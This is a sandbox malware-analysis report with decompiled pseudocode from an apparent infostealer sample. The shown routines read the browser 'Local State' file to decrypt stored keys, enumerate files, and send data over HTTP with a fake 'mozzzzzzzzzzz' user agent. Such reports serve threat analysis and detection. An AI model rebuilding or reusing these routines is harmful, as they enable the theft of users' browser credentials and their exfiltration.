0x0040ab50
0x0040ab59
0x0040ab6b
0x0040ab71
0x0040ab75
0x00000000
0x0040ab7b
0x00000000
0x0040ab7b
0x0040ab75
0x0040aba9
0x0040abb2
0x0040abbb
0x0040abc4
0x0040abcb
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A83D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A857
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A872
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A88D
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A8A8

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB2C

Part of subcall function 0040B177: FindFirstFileW.KERNEL32(00000000,?), ref: 0040B1D0
Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D
Part of subcall function 0040B177: LocalFree.KERNEL32(?), ref: 0040B4D9
Part of subcall function 0040B177: FindClose.KERNEL32(00000000), ref: 0040B4E0

LocalFree.KERNEL32(?), ref: 0040AB25

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

LocalFree.KERNEL32(00000000), ref: 0040AAFB
LocalFree.KERNEL32(?), ref: 0040AB04
LocalFree.KERNEL32(?), ref: 0040AB0D
LocalFree.KERNEL32(?), ref: 0040AB16

Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B

LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB35
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB3E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB47
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB50
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB59
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB80
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB89
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB92
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040AB9B
LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$Findlstrlen$CloseFileFirstGlobal
String ID:
API String ID: 2830129621-0
Opcode ID: b8e71c3e07aea6c3db16d8aaf3b95ea81ae95668bca5d0320dede2fd91e1df24
Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
Opcode Fuzzy Hash: b8e71c3e07aea6c3db16d8aaf3b95ea81ae95668bca5d0320dede2fd91e1df24
Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9 Relevance: 31.6, APIs: 25, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00409BD9(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t92;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t92 = LocalAlloc(0x40, 0x4000); // executed
									_t199 = _t92;
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24); // executed
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x5f5980
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00409be4
0x00409bf0
0x00409bf2
0x00409bf5
0x00409bf9
0x00409bfb
0x00409bff
0x00000000
0x00409c01
0x00409c14
0x00409c18
0x00409c1c
0x00409c2e
0x00409c4a
0x00409c58
0x00409c78
0x00409c83
0x00409c8b
0x00409c9f
0x00409cae
0x00409cd7
0x00409ce2
0x00409cea
0x00409cfe
0x00409d0b
0x00409d3a
0x00409d45
0x00409d47
0x00409d4d
0x00409d55
0x00409d6c
0x00409da6
0x00409da8
0x00409db6
0x00409db9
0x00409dbb
0x00409dbd
0x00409dc4
0x00409dc6
0x00409dc7
0x00409dcd
0x00409dd3
0x00409ddb
0x00409ddc
0x00409de1
0x00409dea
0x00409e00
0x00409e0c
0x00409e1f
0x00409e2b
0x00409e2f
0x00409e34
0x00409e3f
0x00409e47
0x00409e50
0x00409e55
0x00409e5c
0x00409e5f
0x00409e64
0x00409e67
0x00409e71
0x00409e7f
0x00409e95
0x00409e99
0x00409ed6
0x00409e9b
0x00409eaf
0x00409eb1
0x00409eb6
0x00409ecc
0x00409ed1
0x00409eb6
0x00409eda
0x00409ee3
0x00409eec
0x00409ef5
0x00409ef5
0x00409e0c
0x00409de1
0x00409efe
0x00409f07
0x00409f10
0x00409f19
0x00409f20
0x00409f27
0x00409f2d
0x00409f30
0x00000000
0x00409f30
0x00409d71
0x00409d7a
0x00409d83
0x00409d8c
0x00409d92
0x00409d94
0x00409d94
0x00000000
0x00409d94
0x00409d10
0x00409d19
0x00409d22
0x00409d28
0x00000000
0x00409d28
0x00409cb3
0x00409cbc
0x00409cc2
0x00000000
0x00409cc2
0x00409c5d
0x00409c63
0x00000000
0x00409c1e
0x00409c20
0x00409c22
0x00409c24
0x00000000
0x00000000
0x00409c28
0x00000000
0x00409c28

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7388362589624ee787d12e7dc3f2ae4f9de6eadb1fa4da3694aeeb4b4b547b83
Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
Opcode Fuzzy Hash: 7388362589624ee787d12e7dc3f2ae4f9de6eadb1fa4da3694aeeb4b4b547b83
Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407C62 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 232
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00407C62(short* __ecx, intOrPtr _a4, WCHAR* _a8, LPCWSTR* _a12) {
				signed int _v8;
				long _v12;
				long _v16;
				WCHAR* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _t49;
				void* _t53;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t66;
				int _t76;
				void* _t85;
				void* _t89;
				int _t94;
				int _t97;
				long _t98;
				void* _t101;
				void* _t102;
				signed int _t104;
				long _t107;
				void* _t109;
				void* _t115;
				void* _t118;
				WCHAR* _t120;
				void* _t121;
				void* _t124;
				short* _t125;
				signed short* _t126;
				void* _t127;
				void* _t128;
				int _t130;

				_v8 = _v8 & 0x00000000;
				_t125 = __ecx; // executed
				_t49 = LocalAlloc(0x40, 0xc350); // executed
				_t102 = _t49;
				_t120 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v32 = _t120;
				if( *_t125 != 0x68) {
					L24:
					return 0;
				}
				_t53 = 0x74;
				if( *((intOrPtr*)(_t125 + 2)) != _t53 ||  *((intOrPtr*)(_t125 + 4)) != _t53 ||  *((short*)(_t125 + 6)) != 0x70) {
					goto L24;
				} else {
					_v16 =  *(_t125 + 8) & 0x0000ffff;
					_t56 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e3ec);
					_v12 = 0x2f;
					_t115 = 0;
					_t10 = _t56 + 6; // 0x6
					_t126 = _t10;
					_t57 =  *_t126 & 0x0000ffff;
					_t104 = _t57;
					if(_t57 == _v12) {
						L7:
						_t59 =  *((intOrPtr*)( *0x40e08c))(_t120);
						_v20 =  &(_t126[_t59]);
						_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
						_t20 = _t127 + 0x40; // 0x40
						_t107 =  *((intOrPtr*)( *0x40e044))(0x40, _t20);
						_v12 = _t107;
						if(_t127 == 0) {
							L9:
							_t66 = InternetOpenW(L"mozzzzzzzzzzz", 0, 0, 0, 0); // executed
							_t128 = _t66;
							_v24 = _t128;
							if(_t128 == 0) {
								L20:
								_t109 = MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(0) + 1, _t102, 0);
								_v28 = _t109;
								if(_t109 == 0) {
									_t130 = _v8;
								} else {
									_t121 = _t109 + _t109;
									_t76 =  *((intOrPtr*)( *0x40e044))(0x40, _t121);
									_v8 = _t76;
									MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(_v28) + 1, _t102, _t76);
									_t130 = _v8;
									 *((short*)(_t121 + _t130 - 2)) = 0;
								}
								LocalFree(_v12);
								LocalFree(_v32);
								LocalFree(_t102);
								return _t130;
							}
							_push(1);
							_push(0);
							_t83 =  ==  ? 0x1bb : 0;
							_t84 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
							_t85 = InternetConnectW(_t128, _t120, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3); // executed
							_t118 = _t85;
							_v28 = _t118;
							if(_t118 == 0) {
								L19:
								InternetCloseHandle(_t128);
								goto L20;
							}
							_push(1);
							_t88 =  ==  ? 0xc00000 : 0x400000;
							_t89 = HttpOpenRequestW(_t118,  *0x40e25c, _v20, 0, 0, _a12,  ==  ? 0xc00000 : 0x400000, 0x73); // executed
							_t124 = _t89;
							if(_t124 == 0) {
								L18:
								InternetCloseHandle(_v28);
								goto L19;
							}
							_t94 = HttpSendRequestW(_t124, _a8,  *((intOrPtr*)( *0x40e08c))( *((intOrPtr*)( *0x40e198))(_v12)), _a8, _v12); // executed
							if(_t94 == 0) {
								L17:
								InternetCloseHandle(_t124); // executed
								_t128 = _v24;
								goto L18;
							}
							while(1) {
								_t97 = InternetReadFile(_t124, _t102, 0xc350,  &_v16); // executed
								if(_t97 == 0) {
									goto L17;
								}
								_t98 = _v16;
								if(_t98 == 0) {
									goto L17;
								}
								 *((char*)(_t98 + _t102)) = 0;
							}
							goto L17;
						}
						_push(0);
						_push(0);
						_push(_t127);
						_push(_t107);
						_push(0xffffffff);
						_push(_a4);
						_push(0);
						_push(0xfde9);
						if( *((intOrPtr*)( *0x40e0e4))() == 0) {
							goto L24;
						}
						goto L9;
					}
					_t101 = 0;
					do {
						_t115 = _t115 + 1;
						 *(_t101 + _t120) = _t104;
						_t101 = _t115 + _t115;
						_t104 =  *(_t101 + _t126) & 0x0000ffff;
					} while (_t104 != _v12);
					goto L7;
				}
			}

0x00407c6d
0x00407c7b
0x00407c7d
0x00407c84
0x00407c93
0x00407c95
0x00407c98
0x00407ed4
0x00000000
0x00407ed4
0x00407ca0
0x00407ca5
0x00000000
0x00407cc0
0x00407cca
0x00407cd3
0x00407cd5
0x00407cdc
0x00407cde
0x00407cde
0x00407ce1
0x00407ce4
0x00407cea
0x00407d00
0x00407d06
0x00407d17
0x00407d2c
0x00407d2e
0x00407d36
0x00407d38
0x00407d3d
0x00407d5f
0x00407d6f
0x00407d71
0x00407d73
0x00407d78
0x00407e52
0x00407e70
0x00407e72
0x00407e77
0x00407eb4
0x00407e79
0x00407e7e
0x00407e84
0x00407e97
0x00407ea6
0x00407ea8
0x00407ead
0x00407ead
0x00407eba
0x00407ec3
0x00407eca
0x00000000
0x00407ed0
0x00407d7e
0x00407d88
0x00407d9c
0x00407d9f
0x00407da5
0x00407da7
0x00407da9
0x00407dae
0x00407e4b
0x00407e4c
0x00000000
0x00407e4c
0x00407db4
0x00407dcd
0x00407de2
0x00407de4
0x00407de8
0x00407e42
0x00407e45
0x00000000
0x00407e45
0x00407e0e
0x00407e12
0x00407e38
0x00407e39
0x00407e3f
0x00000000
0x00407e3f
0x00407e26
0x00407e32
0x00407e36
0x00000000
0x00000000
0x00407e1b
0x00407e20
0x00000000
0x00000000
0x00407e22
0x00407e22
0x00000000
0x00407e26
0x00407d46
0x00407d47
0x00407d48
0x00407d49
0x00407d4a
0x00407d4c
0x00407d4f
0x00407d50
0x00407d59
0x00000000
0x00000000
0x00000000
0x00407d59
0x00407cec
0x00407cee
0x00407cee
0x00407cef
0x00407cf3
0x00407cf6
0x00407cfa
0x00000000
0x00407cee

APIs

LocalAlloc.KERNEL32(00000040,0000C350,00000000,00000000,00000000,?,?,?), ref: 00407C7D
InternetOpenW.WININET(mozzzzzzzzzzz,00000000,00000000,00000000,00000000), ref: 00407D6F
InternetConnectW.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000001), ref: 00407DA5
HttpOpenRequestW.WININET(00000000,?,00000000,00000000,?,00400000,00000001), ref: 00407DE2
HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
InternetReadFile.WININET(00000000,00000000,0000C350,?), ref: 00407E32
InternetCloseHandle.WININET(00000000), ref: 00407E39
InternetCloseHandle.WININET(?), ref: 00407E45
InternetCloseHandle.WININET(00000000), ref: 00407E4C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
LocalFree.KERNEL32(0000002F), ref: 00407EBA
LocalFree.KERNEL32(?), ref: 00407EC3
LocalFree.KERNEL32(00000000), ref: 00407ECA

Strings

mozzzzzzzzzzz, xrefs: 00407D6A
/, xrefs: 00407CD5

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Internet$Local$CloseFreeHandle$ByteCharHttpMultiOpenRequestWide$AllocConnectFileReadSend
String ID: /$mozzzzzzzzzzz
API String ID: 1268748717-9660103
Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C87 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 151
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401C87(WCHAR* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _t35;
				void* _t42;
				int _t50;
				void* _t56;
				void* _t66;
				struct _OVERLAPPED* _t73;
				void* _t74;
				void* _t77;
				void* _t78;
				long _t81;
				void* _t93;
				void* _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;

				_v12 = __edx;
				_t73 = 0;
				_v8 = __ecx;
				_v20 = 0;
				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t96 = _t35;
				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if(_a16 != 0) {
					_push(__ecx);
				} else {
					PathCombineW(_t96, __ecx, _v12);
					_push(_t96);
				}
				_t98 = _a4;
				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
				_t99 = _v16;
				PathCombineW(_t99, _v8, L"Local State");
				_t42 = CreateFileW(_t99, 0x80000000, 1, _t73, 3, _t73, _t73); // executed
				_t77 = _t42;
				_v12 = _t77;
				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
				_a16 = _t78;
				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
				_v8 = _t93;
				_t50 = ReadFile(_v12, _t93, _a16 - 1,  &_v20, _t73); // executed
				if(_t50 != 0) {
					_t81 = _a16 + _a16;
					_v24 = _t81;
					_t56 = LocalAlloc(0x40, _t81); // executed
					_t100 =  *0x40e1f4; // 0x610c90
					_a16 = _t56;
					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16); // executed
					_push(_a16);
					if( *((intOrPtr*)( *0x40e08c))() > 0) {
						_t101 = _a8;
						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16); // executed
						LocalFree(_a16); // executed
						_t66 = LocalAlloc(0x40, _v24); // executed
						_t102 =  *0x40e200; // 0x60edd8
						_a16 = _t66;
						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16); // executed
						_t74 = _a16;
						if(_t74 != 0) {
							_t103 = _a12;
							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74); // executed
							LocalFree(_t74); // executed
						}
						_t73 = 1;
					}
					FindCloseChangeNotification(_v12); // executed
					_t99 = _v16;
				}
				LocalFree(_t99);
				LocalFree(_t96);
				LocalFree(_v8); // executed
				return _t73;
			}

0x00401c9c
0x00401c9f
0x00401ca1
0x00401ca6
0x00401ca9
0x00401cb0
0x00401cbb
0x00401cc1
0x00401cd1
0x00401cc3
0x00401cc8
0x00401cce
0x00401cce
0x00401cd2
0x00401ce6
0x00401ce8
0x00401cec
0x00401d04
0x00401d06
0x00401d0f
0x00401d14
0x00401d1e
0x00401d29
0x00401d2f
0x00401d3c
0x00401d40
0x00401d4e
0x00401d53
0x00401d56
0x00401d5b
0x00401d61
0x00401d72
0x00401d7e
0x00401d85
0x00401d87
0x00401d99
0x00401d9b
0x00401dab
0x00401db0
0x00401db6
0x00401dc7
0x00401dcc
0x00401dd3
0x00401dd5
0x00401de3
0x00401de5
0x00401de5
0x00401ded
0x00401ded
0x00401df1
0x00401df7
0x00401df7
0x00401dfb
0x00401e02
0x00401e0b
0x00401e17

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401D04
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00401D3C
LocalAlloc.KERNEL32(00000040,?), ref: 00401D56
LocalFree.KERNELBASE(?), ref: 00401D9B
LocalAlloc.KERNEL32(00000040,?), ref: 00401DAB
LocalFree.KERNEL32(?), ref: 00401DE5
FindCloseChangeNotification.KERNEL32(?), ref: 00401DF1
LocalFree.KERNEL32(?), ref: 00401DFB
LocalFree.KERNEL32(00000000), ref: 00401E02
LocalFree.KERNELBASE(?), ref: 00401E0B

Strings

Local State, xrefs: 00401CDE

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocCombineFilePath$ChangeCloseCreateFindNotificationRead
String ID: Local State
API String ID: 4164476917-22827320
Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 22.6, APIs: 15, Instructions: 114COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 004134AC
__heap_init.LIBCMTD ref: 004134B6

Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636

_fast_error_exit.LIBCMTD ref: 004134C4

Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634

__mtinit.LIBCMTD ref: 004134CC
_fast_error_exit.LIBCMTD ref: 004134D7
__RTC_Initialize.LIBCMTD ref: 004134E9
__amsg_exit.LIBCMTD ref: 00413500
___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
___setargv.LIBCMTD ref: 0041351D
__amsg_exit.LIBCMTD ref: 00413528
__setenvp.LIBCMTD ref: 00413530
__amsg_exit.LIBCMTD ref: 0041353B
__cinit.LIBCMTD ref: 00413545
__amsg_exit.LIBCMTD ref: 0041355A
__wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 1259877414-0
Opcode ID: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
Instruction ID: 0f1e660c31b9fec308a46fc5c459b10c93befc3b333bb24cdea645fe2f35eac8
Opcode Fuzzy Hash: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
Instruction Fuzzy Hash: 4941C8B1D00318BBDB10AFA2DD067DEB6B5AB14718F10412EF41597282E77D96808B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004134A5 Relevance: 22.6, APIs: 15, Instructions: 88COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 004134AC
__heap_init.LIBCMTD ref: 004134B6

Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636

_fast_error_exit.LIBCMTD ref: 004134C4

Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634

__mtinit.LIBCMTD ref: 004134CC
_fast_error_exit.LIBCMTD ref: 004134D7
__RTC_Initialize.LIBCMTD ref: 004134E9
__amsg_exit.LIBCMTD ref: 00413500
___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
___setargv.LIBCMTD ref: 0041351D
__amsg_exit.LIBCMTD ref: 00413528
__setenvp.LIBCMTD ref: 00413530
__amsg_exit.LIBCMTD ref: 0041353B
__cinit.LIBCMTD ref: 00413545
__amsg_exit.LIBCMTD ref: 0041355A
__wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

